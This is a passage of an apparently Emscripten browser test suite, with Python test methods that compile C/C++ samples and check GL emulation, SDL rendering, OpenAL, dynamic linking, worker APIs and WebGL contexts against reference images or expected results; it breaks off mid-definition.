def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
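    # supp.cpp was built above as a SIDE_MODULE; main.cpp is built as a MAIN_MODULE that links supp.wasm at load
    # time, and the exit code (76, i.e. suppInt) checks that the two modules see each other's symbols.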
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
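    # Test both with and without a separate memory init file (--memory-init-file 0/1).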
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
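    # Point Module.memoryInitializerRequest at a URL: the real mem init file should load and report 1, while a
    # bogus URL should be caught by the console.warn hook below and report 0.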
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
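    # post_hook defines myJSCallback(), which runs once the runtime is up (called from main(), or from
    # onRuntimeInitialized in the _2 variant); at that point the ccall/cwrap/direct calls are legal, and the
    # noted result is reported back to the test server.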
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
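    # Build the worker side with BUILD_AS_WORKER, then have the main program drive it via the emscripten worker
    # API (emscripten_create_worker / emscripten_call_worker).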
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
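    # Build lib.wasm as a SIDE_MODULE ahead of time; browser_main.cpp is built as a MAIN_MODULE so it can load
    # the side module at runtime.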
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=_one,_two'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
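    # Rename to .so so that --use-preload-plugins recognizes it as a shared library and pre-instantiates it into
    # Module['preloadedWasm'], which main() checks below.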
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
